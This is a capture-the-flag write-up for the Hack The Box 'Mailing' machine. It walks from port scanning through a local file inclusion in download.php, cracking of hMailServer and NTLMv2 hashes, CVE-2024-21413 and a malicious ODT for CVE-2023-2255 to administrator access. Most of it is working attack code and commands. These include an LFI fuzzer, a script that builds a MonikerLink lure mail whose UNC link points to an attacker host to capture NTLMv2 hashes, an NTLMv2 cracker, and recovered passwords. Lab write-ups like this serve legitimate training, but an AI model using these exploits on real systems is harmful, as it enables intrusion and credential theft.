- Enumeration
- Port Scans
- nmap - TCP All ports scan
- HTTP
- Directories / Files
- Local File Inclusion (LFI)
- Exploitation
- User Flag
- Locating Credentials
- Decrypting Credentials
- Verify Credentials
- CVE-2024-21413
- user.txt
- Root flag
- Enumeration of Exploit
- CVE-2023-2255
- root.txt
Enumeration
Port Scans
nmap - TCP All ports scan
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/mailing/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/mailing/results/scans/xml/_full_tcp_nmap.xml" mailing.htb
| Port | State | Service | Version |
|------|-------|---------|---------|
| 25/tcp | open | smtp | hMailServer smtpd |
| 80/tcp | open | http | Microsoft IIS httpd 10.0 |
| 110/tcp | open | pop3 | hMailServer pop3d |
| 135/tcp | open | msrpc | Microsoft Windows RPC |
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
| 143/tcp | open | imap | hMailServer imapd |
| 445/tcp | open | microsoft-ds | |
| 465/tcp | open | smtp | hMailServer smtpd |
| 587/tcp | open | smtp | hMailServer smtpd |
| 993/tcp | open | imap | hMailServer imapd |
| 5040/tcp | open | unknown | |
| 5985/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
| 7680/tcp | open | pando-pub | |
| 47001/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
| 49664/tcp | open | msrpc | Microsoft Windows RPC |
| 49665/tcp | open | msrpc | Microsoft Windows RPC |
| 49666/tcp | open | msrpc | Microsoft Windows RPC |
| 49667/tcp | open | msrpc | Microsoft Windows RPC |
| 49668/tcp | open | msrpc | Microsoft Windows RPC |
| 49669/tcp | open | msrpc | Microsoft Windows RPC |
HTTP
Directories / Files
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 --url http://mailing.htb/ -x txt,php,html -C 403,301,302,400,404
Local File Inclusion (LFI)
Testing the download.php file found by feroxbuster indicates that its file parameter is vulnerable to Local File Inclusion (LFI).
The LFI payload list was taken from https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI payloads.txt.
To explain the command below: --hh 15,1213 hides every response whose body is 15 or 1213 characters long. The 15-character response is the "File not found" message and the 1213-character response is the generic Internal Server Error page, so only payloads that produce something other than those two remain in the output.
wfuzz -w LFI\ payloads.txt -u http://mailing.htb/download.php?file=FUZZ --hh 15,1213
We can verify the traversal manually with curl. win.ini is a good target because it exists on every Windows install and its content is recognisable.
curl http://mailing.htb/download.php?file=../../../../../Windows/win.ini
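The length filter the wfuzz command applies, plus a content check that confirms a hit rather than relying on size alone, can be reproduced in a short script. This is an added example, not code from the original writeup. The fake_download_php function and the win.ini text it returns are constructed stand-ins so the block runs offline; the "File not found" and error-page strings are only matched to the 15 and 1213 lengths above and are not the server's real responses.

```python
from typing import Callable, Dict, Iterable, List

# Constructed stand-ins for the two noise responses the wfuzz command hides
# with --hh 15,1213: a 15-byte "not found" message and a 1213-byte error page.
# Only their lengths matter; the real server's text is not reproduced here.
NOT_FOUND = "File not found."                     # 15 characters
SERVER_ERROR = "<html>" + "x" * 1200 + "</html>"  # 1213 characters
WIN_INI_MARKER = "[fonts]"                        # present in every win.ini: a content canary

# Constructed win.ini body returned by the fake server below.
FAKE_WIN_INI = "; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n"


def traversal_payloads(target: str, max_depth: int = 8) -> List[str]:
    """Directory-traversal candidates for a Windows target path.

    Both slash directions and URL-encoded separators are tried because a
    PHP-on-IIS stack may normalise some and reject others; the depth is
    varied because the web root's distance from C:\\ is unknown.
    """
    seps = ["../", "..\\", "..%2f", "..%5c"]
    return [sep * depth + target for sep in seps for depth in range(1, max_depth + 1)]


def classify(body: str, hidden_lengths: Iterable[int]) -> str:
    """'hidden' reproduces --hh; 'hit' means the canary string is present."""
    if len(body) in set(hidden_lengths):
        return "hidden"
    return "hit" if WIN_INI_MARKER in body else "review"


def fuzz(fetch: Callable[[str], str], payloads: Iterable[str],
         hidden_lengths: Iterable[int] = (15, 1213)) -> Dict[str, str]:
    """Return {payload: verdict} for every response that was not filtered out."""
    hidden = set(hidden_lengths)
    results: Dict[str, str] = {}
    for payload in payloads:
        verdict = classify(fetch(payload), hidden)
        if verdict != "hidden":
            results[payload] = verdict
    return results


def fake_download_php(payload: str) -> str:
    """Constructed stand-in for a vulnerable download.php so the block runs offline:
    URL-encoded separators get the generic error page, and win.ini is only
    reached once enough '..' steps lead back to the drive root."""
    if "%2f" in payload.lower() or "%5c" in payload.lower():
        return SERVER_ERROR
    depth = payload.count("../") + payload.count("..\\")
    if depth >= 5 and payload.replace("\\", "/").endswith("Windows/win.ini"):
        return FAKE_WIN_INI
    return NOT_FOUND


def demo() -> Dict[str, str]:
    """Run the fuzzer against the constructed server; only real traversals survive."""
    return fuzz(fake_download_php, traversal_payloads("Windows/win.ini"))


if __name__ == "__main__":
    for payload, verdict in demo().items():
        print(f"{verdict:6} {payload}")
```

Against the real host, pass a fetch function that inserts the payload into the query string raw (so the %2f and %5c variants are not re-encoded) and that also returns the body of error responses, for example by catching urllib.error.HTTPError and returning e.read().decode(); otherwise the 1213-byte error page never reaches the length filter.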
Exploitation
User Flag
Locating Credentials
As shown in the port scan results, this server appears to be running hMailServer. Its configuration file, hMailServer.ini, sits under Bin in the install directory, and we can read it through the LFI found previously.
curl http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini
Decrypting Credentials
The AdministratorPassword value in the hMailServer.ini file is an unsalted MD5 hash rather than an encrypted password, so CrackStation can be used to look it up.
Verify Credentials
telnet mailing.htb 110
USER administrator@mailing.htb
PASS homenetworkingadministrator
LIST
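The Decrypting Credentials and Verify Credentials steps above can be scripted: pull the hash out of hMailServer.ini, match it against a wordlist, then confirm the result against POP3. This is an added example, not code from the writeup. SAMPLE_INI is a constructed fragment whose MD5 value is computed here from the recovered password, so it is not a copy of the box's real file; verify_pop3 needs the live host and is not exercised offline.

```python
import configparser
import hashlib
import poplib
from typing import Iterable, Optional

# Constructed fragment of hMailServer.ini. The hash is computed here from the
# password the writeup recovers, so it is not a copy of the box's real file.
SAMPLE_INI = (
    "[Directories]\n"
    "ProgramFolder=C:\\Program Files (x86)\\hMailServer\n"
    "\n"
    "[Security]\n"
    "AdministratorPassword=" + hashlib.md5(b"homenetworkingadministrator").hexdigest() + "\n"
)


def admin_hash(ini_text: str) -> str:
    """Pull the AdministratorPassword value (an unsalted MD5 hex digest) out of hMailServer.ini."""
    cp = configparser.ConfigParser(interpolation=None)  # '%' in values must not be interpolated
    cp.read_string(ini_text)
    return cp["Security"]["AdministratorPassword"].strip().lower()


def crack_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline equivalent of the CrackStation lookup: hash each candidate and compare."""
    for cand in candidates:
        if hashlib.md5(cand.encode()).hexdigest() == digest:
            return cand
    return None


def crack_md5_from_file(digest: str,
                        wordlist_path: str = "/usr/share/wordlists/rockyou.txt") -> Optional[str]:
    """Stream a wordlist (rockyou is latin-1) through crack_md5 without loading it into memory."""
    with open(wordlist_path, encoding="latin-1") as fh:
        return crack_md5(digest, (line.rstrip("\r\n") for line in fh))


def verify_pop3(host: str, user: str, password: str, port: int = 110, timeout: int = 10) -> bool:
    """Scripted form of the telnet check: True if the POP3 server accepts USER/PASS.
    Needs the live host, so it is not exercised offline."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        return True
    except poplib.error_proto:
        return False
    finally:
        try:
            conn.quit()
        except (poplib.error_proto, OSError):
            pass


if __name__ == "__main__":
    digest = admin_hash(SAMPLE_INI)
    print(digest, "->", crack_md5(digest, ["password", "homenetworkingadministrator"]))
    # verify_pop3("mailing.htb", "administrator@mailing.htb", "homenetworkingadministrator")
```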
CVE-2024-21413
- Clone the repository.
git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability.git
- Setup responder.
sudo responder -I tun0
- Run exploit.
python3 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.8\admin' --subject Lulz
- After a short wait, Responder captures maya's NTLMv2 response (the hash is truncated here).
maya::MAILING:0b4b9d5848aab6f...
- Crack the hash.
echo 'maya::MAILING:0b4b9d5848aab6f...' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
- Verify the user credentials.
evil-winrm -u maya -p m4y4ngs4ri -i mailing.htb
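The procedure above has two technical ends: the lure mail the PoC sends, and the NTLMv2 response Responder captures and john cracks. The following is an added example covering both; it is not the xaitax PoC's code and not from the original writeup. build_monikerlink_mail creates a message whose file:// hyperlink points at an attacker UNC path with a trailing "!", the documented MonikerLink trigger that makes Outlook resolve the link outside Protected View and authenticate to the attacker's SMB server. The NTLMv2 functions recompute NTProofStr for a candidate password, which is the check john performs. Because the hash on the page is truncated, sample_line builds a self-consistent constructed line for maya instead; its challenge and blob bytes are made up. The share name admin and the "!x" suffix are assumptions, and md4 is implemented in pure Python because hashlib's md4 is commonly disabled under OpenSSL 3.

```python
import hmac
import hashlib
import smtplib
import struct
from email.message import EmailMessage
from typing import Iterable, Optional


# --- Lure: a hyperlink to a UNC path ending in "!" (the MonikerLink trigger) ---
def build_monikerlink_mail(sender: str, recipient: str, subject: str,
                           attacker_host: str, share: str = "admin") -> EmailMessage:
    """HTML mail whose file:// link is \\\\attacker_host\\share followed by '!x'.
    The '!' makes Outlook treat the path as a composite moniker and resolve it
    outside Protected View, so the SMB connection (and the victim's NTLMv2
    response) goes to the attacker. Share name and suffix are assumptions."""
    href = f"file:///\\\\{attacker_host}\\{share}!x"
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, subject
    msg.set_content("Please open the link.")
    msg.add_alternative(f'<html><body><a href="{href}">Click here</a></body></html>',
                        subtype="html")
    return msg


def send_mail(msg: EmailMessage, host: str, port: int = 587,
              username: Optional[str] = None, password: Optional[str] = None) -> None:
    """Submit over the authenticated submission port used above (needs the live host)."""
    with smtplib.SMTP(host, port, timeout=15) as smtp:
        smtp.ehlo()
        if smtp.has_extn("starttls"):
            smtp.starttls()
            smtp.ehlo()
        if username is not None:
            smtp.login(username, password or "")
        smtp.send_message(msg)


# --- Verifying the captured NTLMv2 response (the computation john performs) ---
def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); needed for the NT hash."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(user: str, domain: str, password: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, UPPER(user) + domain), challenge + blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def check_responder_line(line: str, candidate: str) -> bool:
    """line is Responder's NTLMv2-SSP format: user::domain:challenge:ntproofstr:blob."""
    user, _, domain, challenge, proof, blob = line.strip().split(":", 5)
    expected = ntlmv2_proof(user, domain, candidate, bytes.fromhex(challenge), bytes.fromhex(blob))
    return hmac.compare_digest(expected, bytes.fromhex(proof))


def crack_responder_line(line: str, wordlist: Iterable[str]) -> Optional[str]:
    return next((w for w in wordlist if check_responder_line(line, w)), None)


# Constructed sample: the page's hash is truncated, so build a self-consistent line.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" "00c0656c8a2cda01" "a1b2c3d4e5f60718" "00000000" "00000000")


def sample_line(password: str = "m4y4ngs4ri") -> str:
    proof = ntlmv2_proof("maya", "MAILING", password, SAMPLE_CHALLENGE, SAMPLE_BLOB)
    return f"maya::MAILING:{SAMPLE_CHALLENGE.hex()}:{proof.hex()}:{SAMPLE_BLOB.hex()}"


if __name__ == "__main__":
    line = sample_line()
    print(line)
    print("cracked:", crack_responder_line(line, ["123456", "password", "m4y4ngs4ri"]))
```

The domain field used in the HMAC is the one Responder writes into the line (MAILING here), exactly as hashcat mode 5600 and john's netntlmv2 format consume it; only the user name is upper-cased. Feeding the real captured line to crack_responder_line with rockyou.txt reproduces john's result, just far more slowly.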
user.txt
type ..\Desktop\user.txt
whoami
Root flag
Enumeration of Exploit
If we enumerate the scheduled tasks we see one named Test that runs as localadmin.
schtasks /query /fo LIST /tn "Test" /v
We can also verify that this user is in fact a member of the local Administrators group (shown under Local Group Memberships in the output).
net user localadmin
Enumeration of the Program Files directory shows that LibreOffice is installed. Viewing the readme_en-US.txt file shows that version 7.4 is installed.
Get-Content 'C:\Program Files\Libreoffice\readmes\readme_en-US.txt' | Select-Object -First 10
This version appears to be vulnerable to CVE-2023-2255. The public exploit for it works through a malicious ODT file, so the remaining question is where to place the file so that the scheduled task picks it up and opens it. The root of C:\ contains a folder called Important Documents, which looks like a likely candidate.
If we view the contents, the folder is empty. So we write a small test file to the folder, confirm it has actually been written, then wait a few minutes and check again, only to find that it has been removed. So something is periodically processing and clearing this folder.
ls
echo 'test' > dummyfile.txt
ls
# Wait a few minutes
ls
CVE-2023-2255
Clone the repository and generate the exploit. Be sure to use the localized group name Administradores: the host is not running an English locale, so the English name Administrators would not match an existing group.
cd CVE-2023-2255
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
File exploit.odt has been created !
Upload the file to the Important Documents directory.
upload /home/kali/htb/mailing/CVE-2023-2255/exploit.odt
We can see the document has been uploaded and that we are currently not a member of the Administradores group.
ls
net localgroup Administradores
So we wait a minute or two for the document to be processed, then run the above commands again. The document has been removed and the user maya is now a member of the Administradores group.
ls
net localgroup Administradores
Now we simply reconnect with Evil-WinRM so that the new session's token carries the added group membership.
evil-winrm -u maya -p m4y4ngs4ri -i mailing.htb
root.txt
Now we can just read the root.txt file as maya. You could use maya's new membership to dump hashes and log in as localadmin, but it isn't required: as long as you logged out and back in after running the exploit, so that the group membership change has taken effect, you have all the permissions you need.
type C:\Users\localadmin\Desktop\root.txt